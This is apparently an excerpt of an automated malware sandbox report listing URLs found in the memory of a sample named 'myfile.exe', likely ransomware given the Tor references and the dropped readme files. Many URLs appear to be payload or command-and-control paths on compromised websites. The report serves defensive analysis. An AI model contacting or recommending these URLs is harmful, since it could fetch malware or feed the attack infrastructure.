            Source: myfile.exe, 00000000.00000003.2468286003.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://karnesstanleyhvac.com/content/images/gv.pngk
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://karnesstanleyhvac.com/content/images/gv.pngpng
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://karnesstanleyhvac.com/w
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://karnesstanleyhvac.com/wp-json/
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://karnesstanleyhvac.com:443/content/images/gv.png
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lashandbrowenvy.com/
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lashandbrowenvy.com/2
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lashandbrowenvy.com/admin/images/ff.gif
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lashandbrowenvy.com/admin/images/ff.gifql
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lashandbrowenvy.com/m/
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lashandbrowenvy.com/m/(
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lashandbrowenvy.com/w
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lashandbrowenvy.com/wp-json/
            Source: myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lashandbrowenvy.com:443/admin/images/ff.gifc/lgul.jpg4692b
            Source: myfile.exe, 00000000.00000003.2503875458.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lexced.com/
            Source: myfile.exe, 00000000.00000003.2503875458.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lexced.com/5
            Source: myfile.exe, 00000000.00000003.2503875458.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lexced.com/O
            Source: myfile.exe, 00000000.00000003.2503875458.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lexced.com/static/tmp/vd.gif
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503875458.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589691593.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lexced.com/static/tmp/vd.gif#
            Source: myfile.exe, 00000000.00000003.2503875458.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lexced.com/static/tmp/vd.gif9
            Source: myfile.exe, 00000000.00000003.2503875458.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lexced.com/static/tmp/vd.gifw
            Source: myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lexced.com:443/static/tmp/vd.gif3//iybw.jpg.pngResource0
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m2graph.fr/S
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m2graph.fr/m
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m2graph.fr/q
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m2graph.fr:443/news/pics/sovuwxryinfm.pngfc/lgul.jpg4692b
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maxcube24.com.ua/4
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maxcube24.com.ua/wp-content/graphic/wrza.jpg
            Source: myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maxcube24.com.ua:443/wp-content/graphic/wrza.jpg.jpgource0
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mieleshopping.it:443/wp-content/game/doiathwnvkwf.gifa4692b
            Source: myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mursall.de/admin/graphic/qhok.jpg
            Source: myfile.exe, 00000000.00000003.2600006397.0000000005B1B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mursall.de/comments/feed/
            Source: myfile.exe, 00000000.00000003.2600006397.0000000005B1B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mursall.de/feed/
            Source: myfile.exe, 00000000.00000003.2600006397.0000000005B1B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mursall.de/wp-includes/css/dist/block-library/style.min.css
            Source: myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mursall.de/wp-json/
            Source: myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nbva.co.uk/wp-json/
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oscommunity.de/wp-content/pictures/vuvqcuzorejq.png
            Source: myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oscommunity.de:443/wp-content/pictures/vuvqcuzorejq.pngx.gifage
            Source: myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000000FDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pansionatblago.ru/
            Source: myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pansionatblago.ru/n
            Source: myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pansionatblago.ru/t$~
            Source: myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pansionatblago.ru/v
            Source: myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pansionatblago.ru/wp-content/assets/umjrglicgx.jpg
            Source: myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pansionatblago.ru/wp-content/assets/umjrglicgx.jpga
            Source: myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pansionatblago.ru/wp-content/assets/umjrglicgx.jpgw
            Source: myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pansionatblago.ru:443/wp-content/assets/umjrglicgx.jpgurce0
            Source: myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parksideseniorliving.net/
            Source: myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parksideseniorliving.net/#/schema/logo/image/
            Source: myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parksideseniorliving.net/#organization
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parksideseniorliving.net/#website
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parksideseniorliving.net/?s=
            Source: myfile.exe, 00000000.00000003.2382483791.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parksideseniorliving.net/admin/temp/eghuey.png
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parksideseniorliving.net/comments/feed/
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parksideseniorliving.net/feed/
            Source: myfile.exe, 00000000.00000003.2365373242.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503875458.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000000FDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parksideseniorliving.net/l
            Source: myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parksideseniorliving.net/wp-content/uploads/2019/08/Parkside-Logo.png
            Source: myfile.exe, 00000000.00000003.2354706141.0000000001090000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parksideseniorliving.net/wp-json/
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parksideseniorliving.net:443/admin/temp/eghuey.pngResource0
            Source: myfile.exe, 00000000.00000003.2589381515.0000000002C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://princebet88.net/
            Source: myfile.exe, 00000000.00000003.2589450602.0000000005B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://princebet88.site/
            Source: myfile.exe, 00000000.00000003.2600172847.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000000FDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://princebet88.site//
            Source: myfile.exe, 00000000.00000003.2589691593.000000000109D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://princebet88.site/LocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon
            Source: myfile.exe, 00000000.00000002.2894563140.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589381515.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://princebet88.site/amp/
            Source: myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://princebet88.site/assets/images/banner-princebet88.webp
            Source: myfile.exe, 00000000.00000002.2894563140.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589381515.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://princebet88.site/assets/images/fav-princebet88.webp
            Source: myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589328177.0000000002C6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://princebet88.site/assets/images/logo-princebet88.webp
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://princebet88.site:443/data/game/mfkyhvlfokmitv.pngifkynx.gifage
            Source: myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rsidesigns.com/
            Source: myfile.exe, 00000000.00000003.2365373242.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rsidesigns.com/wp-content/assets/iybw.jpg
            Source: myfile.exe, 00000000.00000003.2365282654.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rsidesigns.com/wp-content/assets/iybw.jpg&
            Source: myfile.exe, 00000000.00000003.2365373242.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000000FDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rsidesigns.com/wp-content/assets/iybw.jpgl
            Source: myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rsidesigns.com:443/wp-content/assets/iybw.jpg.pngResource0
            Source: myfile.exe, 00000000.00000002.2895361971.000000000439F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589306558.000000000439D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s3.amazonaws.com/a.storyblok.com/f/20
            Source: myfile.exe, 00000000.00000002.2895361971.000000000439F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589306558.000000000439D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s3.amazonaws.com/a.storyblok.com/f/201186/x/9041c53c26/masifardcn-med
            Source: myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s3.amazonaws.com/a.storyblok.com/f/201186/x/9041c53c26/masifardcn-medium.otf)
            Source: myfile.exe, 00000000.00000003.2365373242.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://satoblog.org/uploads/image/fixizcyhfz.jpg
            Source: myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://satoblog.org:443/uploads/image/fixizcyhfz.jpgrces
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://schema.org
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skoczynski.eu:443/wp-content/image/wn.jpgjpgrces
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stanleyqualitysystems.com/content/images/gv.png
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stanleyqualitysystems.com:443/content/images/gv.pngesource0
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589328177.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2895325965.0000000004360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/scripts/site-bundle.31e4754f5aa3
            Source: myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589328177.0000000002C6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/versioned-assets/1712250249111-G
            Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tailwindcss.com
            Source: myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://testitjavertailut.net/
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://testitjavertailut.net:443/include/tmp/vzac.jpgpngResource0
            Source: myfile.exe, 00000000.00000003.1934915360.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589188241.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2155301553.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942076208.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1980534561.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2008810311.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1647825574.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890024433.0000000002C45000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2025165555.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1647839842.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890097726.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1889990480.0000000002C52000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894500583.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890052478.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, g165067x37-readme.txt37.0.dr, g165067x37-readme.txt16.0.dr, g165067x37-readme.txt29.0.dr, g165067x37-readme.txt4.0.dr, g165067x37-readme.txt56.0.dr, g165067x37-readme.txt23.0.dr, g165067x37-readme.txt61.0.drString found in binary or memory: https://torproject.org/
            Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/cpt0jyz.css);
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vitoriaecoturismo.com.br/
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600404554.0000000001043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vitoriaecoturismo.com.br/admin/graphic/tajahxayexuseayc.jpg
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vitoriaecoturismo.com.br:443/admin/graphic/tajahxayexuseayc.jpgbudsrejserallinclusive.dk/upl
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wribrazil.com:443/data/temp/twcwcymtpqdcchulbw.jpgfault
            Source: myfile.exe, 00000000.00000002.2894114349.0000000000FDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.almamidwifery.com/
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.almamidwifery.com/content/assets/jlbaveucagau.png
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.almamidwifery.com/content/assets/jlbaveucagau.pngI
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.almamidwifery.com/content/assets/jlbaveucagau.pngLocationETagAuthe-RangeContent-Monteion
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.almamidwifery.com/content/assets/jlbaveucagau.pngX
